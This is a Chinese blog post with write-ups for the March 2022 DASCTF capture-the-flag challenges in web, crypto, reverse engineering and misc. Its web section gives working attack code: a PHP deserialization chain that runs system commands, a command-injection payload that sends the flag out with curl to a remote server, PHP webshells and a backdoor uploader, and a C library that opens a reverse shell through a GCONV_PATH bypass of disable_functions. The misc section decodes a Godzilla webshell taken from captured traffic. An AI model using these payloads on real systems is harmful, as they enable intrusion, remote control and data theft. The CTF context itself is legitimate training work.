2022年3月buu月赛dasctf

已于 2022-04-07 17:29:33 修改
阅读量5.9k 收藏 4
点赞数 3
文章标签: php python 网络安全 web安全
于 2022-03-27 21:40:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51458899/article/details/123782291
版权

2022年3月buu月赛dasctf

web

ezpop

<?php


class what
{
    public $a;

    public function __construct(){
        $this->a = new fin();
    }
}


class mix{
    public $m1;

    public function __construct(){
        $this->m1 = "?><?=system('cat H0mvz850F.php');";
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}



class fin{
    public $f1;

    public function __construct(){
        $this->f1 = array(new mix(), 'get_flag');
    }
}


$a = new fin();
$a->f1 = new what();
echo urlencode(serialize($a));

好可爱的一道题,终于有简简单单的pop链了
fin->(调用destruct)->what->(调用tostring)->fin->(调用run)->crow->(调用invoke)->fin->(调用call)->mix->(getflag)
绕过井号:利用?><?php标签绕过

去以后ls可以看到很多文件,本来想要去搞那个flag.sh,但是觉得可能是出题用的,所以cat /* 然后看到了一个congratulations,是H0mvz850F.php文件,里面有注释掉的flag(所以直接cat /* 会被解析看不到)

calc

关键源码

@app.route("/calc",methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)
    
    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"

waf(num)的黑名单是blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']

审题

data = eval(num)		#执行python code
os.system(log)			#执行系统命令

而log里面的参数是可控的

由于黑名单里面过滤了小括号,又强制转化为小写,所以无法绕过;

思考不需要小括号的rce,发现几乎不可能,没有小括号意味着无法调用函数

据说 exec '代码'也是可行的,但是由于题目环境问题无法复现

随即放弃利用eval进行rce

注意到og里面的参数是可控的,system直接执行系统命令

于是题目转化为如何让"echo {0} {1} {2}> ./tmp/log.txt"能够rce

由于我的疏忽(客观上是 没有用pycharm进行debug 或者没有 print),

忽视了data = eval(num)如果语法错误也会使os.system(log)无法执行

所以卡了好久

为了使得log能够rce,eval必须要注释掉一些东西,我考虑到注释符,由于python中的#号和unix中的#号有不同之处

unix

如果#号和字符紧贴着的话会被视为字符而不是注释符

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dz3ubLYE-1648387988370)(C:/Users/20281/AppData/Roaming/Typora/typora-user-images/image-20220327114731199.png)]

python

无论紧贴与否都视为注释

所以很快想到了payload1

1# `rce`

另外一点

unix中加上反斜杠可以把#号转义为普通字符

而python中无法使用反斜杠转义注释符

所以payload2

1 /# `rce`

之后考虑外带,空格可以用%09绕过,反引号可以嵌套使用,记得加上转义

payload

/calc?num=1%23`curl%09http://vps/?flag=\`cat%09Th1s*\``

upgdload(赛后)

比赛的时候卡calc题了,结果没有好好看这道题,其实没有想象的那么难

我的发现:

要求php又要求不能被发现
改文件类型image/jpeg就饶过了
eval被过滤…
phpinfo();上去看到disable_function好多函数被禁用

队友的发现:

过滤了 eval 和 “ ” 符 号 , e v a l 用 大 小 写 可 以 绕 过 , 想 着 用 b a s e 6 4 d e c o d e ( J A = = ) 来 绕 过 " ” 符号,eval用大小写可以绕过,想着用base64_decode(JA==)来绕过 " evalbase64decodeJA==""来写马,但……

关键点:

  • 发现phpinfo有disable_function,所以要加载exp.so
  • php文件的被过滤函数均可大小写绕过

disable_function如何绕过:

加载exp.so是最彻底的解决方式,退一步则是看function里面有没有没被ban的函数,这里可以看到show_source,file_get_contents没被ban,遂用其读取源码

image-20220327152743046

没有过滤eval(index.php过滤的那个可以使用大小写绕)

先测试一下

<?php
Eval(base64_decode('cGhwaW5mbygpOw==').';');
?>

说明可以使用base64写马Eval(base64_decode('ZXZhbCgkX1BPU1RbJ2EnXSk7').';');和show_source读文件

写马上去以后考虑蚁剑绕disable_function,但因为蚁剑支持的php版本小于8,所以要手动绕

先读取/flag,失败后读index.php

<?php
Eval(base64_decode('c2hvd19zb3VyY2UoJy4uL2luZGV4LnBocCcpOw==').';');
?>

审计了index.php后,准备上传exp.so,方式也很花,可以先写(上传)一个任意上传文件的php,之后再通过该文件上传exp.so,为了避免被disable_func限制,该文件的内容仿造这个index.php即可,如下

<div class="light"><span class="glow">
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
    嘿伙计,传个火?!
    <input class="input_file" type="file" name="upload_file"/>
    <input class="button" type="submit" name="submit" value="upload"/>
</form>
</span><span class="flare"></span><div>
<?php
error_reporting(0);
//设置上传目录
define("UPLOAD_PATH", "/tmp");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_name = $_FILES['upload_file']['name'];
$ext = pathinfo($file_name,PATHINFO_EXTENSION);

$content = file_get_contents($temp_file);

$new_file_name = $file_name;
        $img_path = UPLOAD_PATH . '/' . $new_file_name;
        if (move_uploaded_file($temp_file, $img_path)){
            $is_upload = true;
        } else {
            $msg = 'Upload Failed!';
            die();
        }
        echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}

不过一开始我失败了很多次,因为那个base64过长,里面有些内容凑巧被黑名单给识别了

PGRpdiBjbGFzcz0ibGlnaHQiPjxzcGFuIGNsYXNzPSJnbG93Ij4NCjxmb3JtIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0icG9zdCIgb25zdWJtaXQ9InJldHVybiBjaGVja0ZpbGUoKSI+DQogICAg5Zi/5LyZ6K6h77yM5Lyg5Liq54Gr77yf77yBDQogICAgPGlucHV0IGNsYXNzPSJpbnB1dF9maWxlIiB0eXBlPSJmaWxlIiBuYW1lPSJ1cGxvYWRfZmlsZSIvPg0KICAgIDxpbnB1dCBjbGFzcz0iYnV0dG9uIiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9InVwbG9hZCIvPg0KPC9mb3JtPg0KPC9zcGFuPjxzcGFuIGNsYXNzPSJmbGFyZSI+PC9zcGFuPjxkaXY+DQo8P3BocA0KZXJyb3JfcmVwb3J0aW5nKDApOw0KLy/orr7nva7kuIrkvKDnm67lvZUNCmRlZmluZSgiVVBMT0FEX1BBVEgiLCAiL3RtcCIpOw0KJG1zZyA9ICJVcGxvYWQgU3VjY2VzcyEiOw0KaWYgKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKSB7DQokdGVtcF9maWxlID0gJF9GSUxFU1sndXBsb2FkX2ZpbGUnXVsndG1wX25hbWUnXTsNCiRmaWxlX25hbWUgPSAkX0ZJTEVTWyd1cGxvYWRfZmlsZSddWyduYW1lJ107DQokZXh0ID0gcGF0aGluZm8oJGZpbGVfbmFtZSxQQVRISU5GT19FWFRFTlNJT04pOw0KDQokY29udGVudCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCR0ZW1wX2ZpbGUpOw0KDQokbmV3X2ZpbGVfbmFtZSA9ICRmaWxlX25hbWU7DQogICAgICAgICRpbWdfcGF0aCA9IFVQTE9BRF9QQVRIIC4gJy8nIC4gJG5ld19maWxlX25hbWU7DQogICAgICAgIGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJHRlbXBfZmlsZSwgJGltZ19wYXRoKSl7DQogICAgICAgICAgICAkaXNfdXBsb2FkID0gdHJ1ZTsNCiAgICAgICAgfSBlbHNlIHsNCiAgICAgICAgICAgICRtc2cgPSAnVXBsb2FkIEZhaWxlZCEnOw0KICAgICAgICAgICAgZGllKCk7DQogICAgICAgIH0NCiAgICAgICAgZWNobyAnPGRpdiBzdHlsZT0iY29sb3I6I0YwMCI+Jy4kbXNnLiIgTG9vayBoZXJlfiAiLiRpbWdfcGF0aC4iPC9kaXY+IjsNCn0=

image-20220327204344982

成功后,记住这个文件名

传前面所说的马上去(验证一下a=phpinfo();能否执行)

之后

a=include('php://filter/convert.base64-decode/resource=872b97ca230394aba8221f9a977fa931.php');

image-20220327204629266

包含了我们自己写的upload.php,这下我以为可以随便传了,结果发现这个一句话其实是“动态的”,我传文件的时候一句话的命令不会执行(可能是hackbar的问题,post和用户界面操作不能同步)

所以只好再写一个文件上去include这个自己写的upload.php

<?php
Include(base64_decode('cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT03MDU3ZWEyYTBmMDNhMzFlNDAzZDcyZjZiZDA3OGJlMS5waHA='));

之后利用(67条消息) 使用GCONV_PATH与iconv进行bypass disable_functions_lesion__的博客-CSDN博客

准备上传exp.so和gconv-modules

exp.c

#include <stdio.h>
#include <stdlib.h>

void gconv() {}

void gconv_init() {
  system("bash -c 'exec bash -i &>/dev/tcp/ip/port <&1'");
}

gcc exp.c -o exp.so -shared -fPIC

另一个方法是先上传exp.so的php文件再重命名为exp.so,但exp.so内容直接上传也会被ban(应该也能绕过,我尝试base64无果就放弃了)

gconv-modules

原来

module  自定义字符集名字(大写)//    INTERNAL    ../../../../../../../../tmp/自定义字符集名字(小写)    2
module  INTERNAL    自定义字符集名字(大写)//    ../../../../../../../../tmp/自定义字符集名字(小写)    2

根据题目如下修改:

module  EXP//    INTERNAL    ../../../../../../../../tmp/exp    2 
module  INTERNAL   EXP//    ../../../../../../../../tmp/exp    2

image-20220327210834655

然后利用我们之前上传的马进行触发,vps监听端口

a=putenv("GCONV_PATH=/tmp/");include('php://filter/read=convert.iconv.exp.utf-8/resource=/tmp/exp.so');

反弹了shell

image-20220327211944925

没权限

find / -user root -perm -4000 -print 2>/dev/null

发现nl有权限

nl /flag

image-20220327212121493

密码

from gmpy2 import gcd, invert, iroot
from Crypto.Util.number import getPrime, long_to_bytes, bytes_to_long
lans = []
rans = []
L, R = 15720197268945348388429429351303006925387388927292304717594511259390194100850889852747653387197205392431053069043632340374252629529419776874410817927770922310808632581666181899, 139721425176294317602347104909475448503147767726747922243703132013053043430193232376860554749633894589164137720010858254771905261753520854314908256431590570426632742469003
lans.append(L)
rans.append(R)
while(R != 0):
    temp = L % R
    L = R
    R = temp
    lans.append(L)
    rans.append(R)

lans.reverse()
rans.reverse()
L = lans
R = rans
# L = [1, 133317, 137492755075, 24316418691677517, 2694478038943586736328, 449366186013055209469307061, 424678007756192434300006917804988, 67952303343509961405922862120527631953, 10722465754210488857842384539746544074196670, 11050144307727113700681557772687121323224647867153, 11731219952144596819377276074864534430521345582519171825, 1501209023627137765492979001172871435243212151481455508796928, 240324048977128823416619126180138745528644638124733113619292984561, 241267801518963217329803327254141129383508497053892152707957403620167975, 32759342090485149698017824597983901673872922475506121132811189377165700630061, 5830376668137452804173383567980586211563348379884185911787096393298400138955904511, 6028609474886885541605763758989943967354486126474121155263363791803356933057570965004061, 973825402922208545745882895848854992390620148165434035074196392656950555217820068399921894085, 163194634853135239779527687110852732238802459017066087158243026833107794785760861815584881897662446, 19287157921091613716265688246942013055491723611322575658962386161345041119412098008892719335475158074595, 19304497076225869711849746340455541612339463403087957113496859433662333338211557279788474751973335123601723351, 19346619488865481717482094100686681292384530125288986759529832156605546935716879938892385301891033660176897469426477, 18822751726365286700612339826340137082689797360168751039458371318582478795225200597245268849966216725478600774872948579145,
#      17728566345779292838907909381612640668036643431117165902908905722221490552536570008262521006387722966311695266888986102760148482, 16713517279670522179142602316669021266414545548551242366498025076135157482269671171234675566764239156725485371108735804221489129242235, 3121683903445470016877317983137081025437455800044243487676152297523129079630621593231064333666220053742946978640516933836161839706107832842, 3038050870004975946934828279229998090001629942971672705946371743686684953534372767609080560274203027849883925292484330032865963662762987021572213, 363542281260527120641507826394376579427002124891256726811704925452455933892306777570036028677323021255266880206017499363363356743613369155668503557061, 41491807647864532203061547188977816042392604608090542687445179257686072390683442091157724792609311622180322599523073162631870961894947012137520634996058265, 7402968320895532116930768370098929764678065093602516751185225609968053961398195671796668035067389408306736179462173593882795916384659802649189800851665219198361, 935298420671754230833014738849730432588169238033228173469583131476419084794695511761146278309606770027490667271610796624269392034586175088396235641537756093736185366, 139721425176294317602347104909475448503147767726747922243703132013053043430193232376860554749633894589164137720010858254771905261753520854314908256431590570426632742469003, 15720197268945348388429429351303006925387388927292304717594511259390194100850889852747653387197205392431053069043632340374252629529419776874410817927770922310808632581666181899]
# R = [0, 1, 133317, 137492755075, 24316418691677517, 2694478038943586736328, 449366186013055209469307061, 424678007756192434300006917804988, 67952303343509961405922862120527631953, 10722465754210488857842384539746544074196670, 11050144307727113700681557772687121323224647867153, 11731219952144596819377276074864534430521345582519171825, 1501209023627137765492979001172871435243212151481455508796928, 240324048977128823416619126180138745528644638124733113619292984561, 241267801518963217329803327254141129383508497053892152707957403620167975, 32759342090485149698017824597983901673872922475506121132811189377165700630061, 5830376668137452804173383567980586211563348379884185911787096393298400138955904511, 6028609474886885541605763758989943967354486126474121155263363791803356933057570965004061, 973825402922208545745882895848854992390620148165434035074196392656950555217820068399921894085, 163194634853135239779527687110852732238802459017066087158243026833107794785760861815584881897662446, 19287157921091613716265688246942013055491723611322575658962386161345041119412098008892719335475158074595, 19304497076225869711849746340455541612339463403087957113496859433662333338211557279788474751973335123601723351, 19346619488865481717482094100686681292384530125288986759529832156605546935716879938892385301891033660176897469426477, 18822751726365286700612339826340137082689797360168751039458371318582478795225200597245268849966216725478600774872948579145,
#      17728566345779292838907909381612640668036643431117165902908905722221490552536570008262521006387722966311695266888986102760148482, 16713517279670522179142602316669021266414545548551242366498025076135157482269671171234675566764239156725485371108735804221489129242235, 3121683903445470016877317983137081025437455800044243487676152297523129079630621593231064333666220053742946978640516933836161839706107832842, 3038050870004975946934828279229998090001629942971672705946371743686684953534372767609080560274203027849883925292484330032865963662762987021572213, 363542281260527120641507826394376579427002124891256726811704925452455933892306777570036028677323021255266880206017499363363356743613369155668503557061, 41491807647864532203061547188977816042392604608090542687445179257686072390683442091157724792609311622180322599523073162631870961894947012137520634996058265, 7402968320895532116930768370098929764678065093602516751185225609968053961398195671796668035067389408306736179462173593882795916384659802649189800851665219198361, 935298420671754230833014738849730432588169238033228173469583131476419084794695511761146278309606770027490667271610796624269392034586175088396235641537756093736185366, 139721425176294317602347104909475448503147767726747922243703132013053043430193232376860554749633894589164137720010858254771905261753520854314908256431590570426632742469003]  # print(len(L))
ans = []
for i in range(1, len(L)):
    l = L[i]
    r = R[i]
    bf = R[i-1]
    l -= bf
    l //= r
    while(l):
        l -= 1
        if(iroot(l, 3)[1]):
            print(chr(iroot(l, 3)[0]), end="")
            ans.append(chr(iroot(l, 3)[0]))
            break

re

for ( i = 0; a2--; output[v4++] = miyaoliu[(miyaoliu[j] + miyaoliu[i]) % 256] )
  {
    i = (i + 1) % 256;
    j = (j + miyaoliu[i]) % 256;
    v3 = miyaoliu[i] + 66;
    miyaoliu[i] = miyaoliu[j] - 33;
    miyaoliu[i] ^= 2u;
    miyaoliu[j] = 5 * v3;
    miyaoliu[j] = miyaoliu[i] - 10;
    miyaoliu[j] += miyaoliu[i];
    miyaoliu[i] -= 18;
  }
  
  //粗略看了下:
    for ( i = 0; a2--; output[v4++] = myl[(myl[j] + myl[i]) % 256] )
  {
    i = (i + 1) % 256;
    j = (j + myl[i]) % 256;
    
    myl[j] = (myl[j]-33) ^2u-10+(myl[j]-33) ^2u;
    myl[i] = (myl[j]-33)^2u-18;
  }
  
  
#define _CRT_SECURE_NO_WARNINGS
#include <iostream>
#include <windows.h>
using namespace std;

int Sbox[256];
int Tbox[256];
int rc4Source[72];

int initSbox()
{
	int result; // eax
	int i; // [esp+Ch] [ebp-4h]

	for (i = 0; i <= 255; ++i)
	{
		result = i;
		Sbox[i] = i;
	}
	return result;
}

size_t initTbox()
{
	size_t result; // eax
	char key[8]; // [esp+14h] [ebp-24h] BYREF
	int v2; // [esp+1Ch] [ebp-1Ch]
	int v3; // [esp+20h] [ebp-18h]
	int v4; // [esp+24h] [ebp-14h]
	int keylen; // [esp+28h] [ebp-10h]
	int i; // [esp+2Ch] [ebp-Ch]

	strcpy(key, "123456");
	key[7] = 0;
	v2 = 0;
	v3 = 0;
	v4 = 0;
	result = strlen(key);
	keylen = result;
	for (i = 0; i <= 255; ++i)
	{
		result = (unsigned __int8)key[i % keylen];
		Tbox[i] = result;
	}
	return result;
}

int initKey()
{
	int result; // eax
	int t; // [esp+4h] [ebp-Ch]
	int i; // [esp+8h] [ebp-8h]
	int j; // [esp+Ch] [ebp-4h]

	j = 0;
	for (i = 0; i <= 255; ++i)
	{
		j = ((char)Tbox[i] + j + Sbox[i]) % 256;
		t = Sbox[i];
		Sbox[i] = Sbox[j];
		result = j;
		Sbox[j] = t;
	}
	return result;
}

bool __cdecl rc4()
{
	int v2; // eax
	bool result; // al
	int v4; // [esp+10h] [ebp-10h]
	int v5; // [esp+14h] [ebp-Ch]
	int j; // [esp+18h] [ebp-8h]
	int i; // [esp+1Ch] [ebp-4h]
	int inputLen = 42;
	v5 = 0;
	j = 0;
	for (i = 0; ; rc4Source[v5++] = Sbox[(Sbox[j] + Sbox[i]) % 256])
	{
		v2 = inputLen--;
		result = v2 != 0;
		if (!result)
			break;
		i = (i + 1) % 256;
		j = (j + Sbox[i]) % 256;
		v4 = Sbox[i] + 66;
		Sbox[i] = Sbox[j] - 33;
		Sbox[i] ^= 2u;
		Sbox[j] = 5 * v4;
		Sbox[j] = Sbox[i] - 10;
		Sbox[j] += Sbox[i];
		Sbox[i] -= 18;
	}
	return result;
}

int main()
{
	int v2[50]; // [esp+1Ch] [ebp-DCh] BYREF

	initSbox();
	initTbox();
	initKey();
	rc4();

	v2[0] = -61;
	v2[1] = -128;
	v2[2] = -43;
	v2[3] = -14;
	v2[4] = -101;
	v2[5] = 48;
	v2[6] = 11;
	v2[7] = -76;
	v2[8] = 85;
	v2[9] = -34;
	v2[10] = 34;
	v2[11] = -125;
	v2[12] = 47;
	v2[13] = -105;
	v2[14] = -72;
	v2[15] = 32;
	v2[16] = 29;
	v2[17] = 116;
	v2[18] = -47;
	v2[19] = 1;
	v2[20] = 115;
	v2[21] = 26;
	v2[22] = -78;
	v2[23] = -56;
	v2[24] = -59;
	v2[25] = 116;
	v2[26] = -64;
	v2[27] = 91;
	v2[28] = -9;
	v2[29] = 15;
	v2[30] = -45;
	v2[31] = 1;
	v2[32] = 85;
	v2[33] = -78;
	v2[34] = -92;
	v2[35] = -82;
	v2[36] = 123;
	v2[37] = -84;
	v2[38] = 92;
	v2[39] = 86;
	v2[40] = -68;
	v2[41] = 35;

	for (int i = 0; i <= 41; i++)
	{
		int ch = ((v2[i] - 71) ^ LOBYTE(rc4Source[i]));
		cout << (char)ch;
	}

	return 0;
}

misc

Au5t1n的秘密

瞄了一眼,http居多的话,大概是个抓取http包分析的题目,那和web关系就大了喔

image-20220404210259578

搜索200状态码

image-20220402123316505

上面这个是重要信息,下面也是

image-20220402123422305

fputs(fopen("didi.php","w"),base64_decode('PD9waHAKQHNlc3Npb25fc3RhcnQoKTsKQHNldF90aW1lX2xpbWl0KDApOwpAZXJyb3JfcmVwb3J0aW5nKDApOwpmdW5jdGlvbiBlbmNvZGUoJEQsJEspewogICAgZm9yKCRpPTA7JGk8c3RybGVuKCREKTskaSsrKSB7CiAgICAgICAgJGMgPSAkS1skaSsxJjE1XTsKICAgICAgICAkRFskaV0gPSAkRFskaV1eJGM7CiAgICB9CiAgICByZXR1cm4gJEQ7Cn0KJHBheWxvYWROYW1lPSdwYXlsb2FkJzsKJGtleT0nMDkzYzFjMzg4MDY5YjdlMSc7CiRkYXRhPWZpbGVfZ2V0X2NvbnRlbnRzKCJwaHA6Ly9pbnB1dCIpOwppZiAoJGRhdGEhPT1mYWxzZSl7CiAgICAkZGF0YT1lbmNvZGUoJGRhdGEsJGtleSk7CiAgICBpZiAoaXNzZXQoJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV0pKXsKICAgICAgICAkcGF5bG9hZD1lbmNvZGUoJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV0sJGtleSk7CgkJZXZhbCgkcGF5bG9hZCk7CiAgICAgICAgZWNobyBlbmNvZGUoQHJ1bigkZGF0YSksJGtleSk7CiAgICB9ZWxzZXsKICAgICAgICBpZiAoc3RyaXBvcygkZGF0YSwiZ2V0QmFzaWNzSW5mbyIpIT09ZmFsc2UpewogICAgICAgICAgICAkX1NFU1NJT05bJHBheWxvYWROYW1lXT1lbmNvZGUoJGRhdGEsJGtleSk7CiAgICAgICAgfQogICAgfQp9'))

解码以后可以看到是个马,其实是哥斯拉的小马

image-20220404210607971

run函数猜测是如下(如有猜错望指出),但不影响解题

image-20220404211424032

可能有初学者看不大懂这个加密,其实是个简单的异或加密,而异或加密的特点就是再和密钥异或一遍等于他本身

demo

<?php
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}

function decode($D,$K){
   for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}

$payloadName='payload';
$key='093c1c388069b7e1';
echo $payloadName;echo '<br>';
echo $a = encode($payloadName,$key);echo '<br>';
echo decode($a,$key);

image-20220404212833832

可以看出来后面会对着这个木马post payload

http contains "didi"

image-20220404213637192

看了一下,不得了,一大坨东西(加密的),想办法解密,直接解密或者加base64都是不行的

这个时候来点

image-20220404215954996

image-20220404220803656

不好意思,这里复现失败了,正常是会提取出一个大马

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dBbowL98-1649323744165)(https://raw.githubusercontent.com/hmt38/abcd/main/image-20220407172317469.png)]

关键点如图,然后执行了一个gzencode($result,6),导致最后return的result和哥斯拉直接解密的result是不一样的,因此在后面的恢复过程中必须加上这个。否则后面一大串都是乱码。
然后flag是在第2079流里

因为要用到gzencode,所以要用php

<?php
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}

$key = '093c1c388069b7e1';
$data = 'JrhrMWMzODgwNnKp+yzEe/V+BmMGU1joHxkWZdbHzcwrzoftAY7cxGzLbZ/z8e38Bc7XradHhZL8tA3CudX1rOtnxaYjHjnm/Bobbrsl57NE9kJv7pW1HnCAP3JEZQBodnom+Oa9VxHxsQvwe+eHxRGsDsgXX/kE342APGVWZM51C80lwh+VYUoRSCt0GVFH7swmrIR5sydtIjeSUQGDV/lW1TtgNxB4Wa50Pmd0dzYwtSw/IdhvYu9WvbPVSfNjeEfjBkgofDUTdS3yMQRItrv3gdORz5ostfpb5+txYj3Oz/ebr6+kfEWz1bZ9KLfs7aHvzXdDaEkx465004EWloEyoDNjt1ohhnQ4Yjc=';
$decode = encode(base64_decode($data),$key);
$flag = base64_encode(gzdecode($decode));
echo $flag;

之后得到一串base64用解出来就行,linux直接解

echo "ZmlsZU5hbWUCJQAAAC93d3cvd3d3cm9vdC9jbXMuY29tL2UvYWRtaW4vZmxhZy56aXBmaWxlVmFsdWUC6QAAAFBLAwQUAAEAAADgvnNUSoE1gTQAAAAoAAAACAAAAGZsYWcudHh00Ij2ZFPCaGI0UraMI82E8sagnkvdbUoamST8kMciWCMbKXXcYaSAX1GLiv+iic51c+LRE1BLAQI/ABQAAQAAAOC+c1RKgTWBNAAAACgAAAAIACQAAAAAAAAAIAAAAAAAAABmbGFnLnR4dAoAIAAAAAAAAQAYAPJAEq+pO9gB8kASr6k72AEXBBOVqTvYAVBLBQYAAAAAAQABAFoAAABaAAAAHwBwYXNzd29yZCBpcyBtZDUoR29kemlsbGEnIGtleSkAbWV0aG9kTmFtZQIKAAAAdXBsb2FkRmlsZQ==" | base64 -d > test

用7zip解压的话不能命名为zip后缀,winrar,binwalk随意 (所以说7zip真的fw)

解压要密码,提示说哥斯拉的密钥的md5值,在前面的某一个流量中,上传了一个key
内容为key is key1***,然后又说是哥斯拉的key,因此只要对上就可以了

import hashlib
import string
import itertools
table = string.printable
key = '093c1c388069b7e1'
for i in itertools.product(table, repeat = 3):
    passwd = 'key1' + ''.join(i)
    m = hashlib.md5(passwd.encode()).hexdigest()
    if(key in m):
        print(m,passwd)

image-20220407172556336

ththaiai
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 10
    评论
DASCTF月赛
weixin_44687621的博客
04-10 3183
DASCTF2022.3部分题目 Web ezpop 题目源码如下 <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin {
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
BUU-Reveser-XMAN2018排位赛_easywasm(WebAssembly逆向分析)
[DASCTF 2022]三月赛 web 复现
cosmoslin的博客
03-29 6487
ezpop <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin { public $f1; public
2022DASCTF X SU 三春季挑战赛 Web部分 WriteUp
weixin_51804748的博客
04-04 4042
ezpop <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin { public $f1; public.
DASCTF X GFCTF 2024|四开启第一局
qq_61670993的博客
04-21 846
简单题
DASCTF 2023六挑战赛 二进制专项 easynote
z1r0的博客
06-05 361
uaf,堆溢出,2.23。
[DASCTF 2023]controlflow
CHTXRT的博客
07-22 333
直接反编译,通过汇编代码结合动态调试综合分析,得到输入数据变化过程大致如下:(设输入字符串为。出处:https://blog.csdn.net/CHTXRT。」创作共享协议,转载请在文章明显位置注明作者及出处。
BUU 论坛的编辑器163Editor
09-21
BUU 论坛的编辑器DianUbb.rar
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
这个名字来自电影“灰姑娘”中的咒语“ Bibidi Barbidibou”,分为三个,Bibi是制片人,Babidi是去除魔鬼印记的人,Buu成了魔鬼的名字。 以下是您将获得的其他功能的列表:-待办事项列表-设置您喜欢的壁纸-发现新的...
POSN:POSN-BUU的源代码
04-01
POSN POSN-BUU的源代码
The HMT effects on the nucleon collective flows in BUU transport model
03-14
基于BUU模型利用集体流研究HMT效应,张芳,,基于半经典的BUU输运模型,我们利用中-质微分流、中子-质子流之差以及质子椭圆流研究了核内核子动量分布的高动量尾巴(HMT)效应。研
DASCTF Apr.2023 X SU Writeup By AheadSec
末初的CSDN博客
04-23 4985
DASCTF Apr.2023 X SU Writeup By AheadSec
DASCTF Apr.2023 X SU战队2023开局之战 pwn
m0_63437215的博客
04-24 590
DASCTF Apr.2023 X SU战队2023开局之战
2022DASCTF X SU】 三春季挑战赛 web复现
errorr0
04-20 1486
DASCTF
DASCTF X CBCTF 2022挑战赛 学习记录
m0_64815693的博客
09-23 1883
学习记录
[DASCTF Apr.2023 X SU战队2023开局之战] crypto复现
weixin_52640415的博客
04-26 1374
ecrsa hnp 卡迈尔数 hash碰撞
4.24--4.30 Crypto刷题笔记
qq_73505302的博客
05-14 187
学习
2022DASCTF MAY 出题人挑战赛
as you know, nlp is fantasitc!
05-22 335
fxxkgo(复现) 原题参考 知识点:go语言的SSTI注入、jwt伪造 dockerfile目录里面的信息 main.go里面包含的包 思路:通过ssti拿到secret,然后伪造jwt Golang SSTI参考文章 ssti的利用点在 register 路由 注册{{.}}用户, {{.}}就是泄漏secret的payload auth 路由 \ 路由 用得到的secret伪造jwt flag路由拿到flag ...
2022DASCTF X SU 三春季挑战赛 checkin 各种脚本学习分析
臭nana的博客
04-03 4574
只能溢出0x10个字节,刚好能够覆盖返回地址,所以得利用栈迁移来做 第一种:利用magic_gadget修改got表中setvbuf的值 在64位程序的_do_global_dtors_aux中有这么一个gadget十分有用,可以直接改栈数据magic_gadget:add dword ptr [rbp - 0x3d], ebx ; nop ; ret 利用read函数溢出,迁移栈到bss段上,然后通过一些小gadget调整寄存器的值来达到目的 出处:2022DASCTFXSU三春季挑战赛-p
buu cipher
10-23
Buu Cipher 是一种对称加密算法,也被称为布式密码。它是一种较为简单的加密算法,基于置换和替代的原理进行加密和解密。Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中的不同位置,增加了密文的复杂性。 其次,扩散步骤通过将每个字符替换为另一个字符来进一步混淆数据。此替换过程可以由算法中的扩散函数完成,该函数使用密钥和置换表来生成相应的替代字符。这样,明文中的每个字符都将被替换为不同的字符。 解密过程与加密过程相反。先使用相同的密钥和置换表进行扩散的逆向操作,将密文中的每个字符恢复为替代字符。然后使用相同的密钥和置换表进行混淆的逆向操作,恢复密文中字符的顺序,即可得到原始的明文。 尽管 Buu Cipher 是一种较为简单的加密算法,但它仍可以提供基本的保密性,以防止未授权者对加密数据的解读。然而,它的加密强度相对较低,可能容易受到密码分析方法的攻击。因此,在实际应用中,我们可能需要结合其他更为复杂和安全的加密算法来提高数据的保密性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值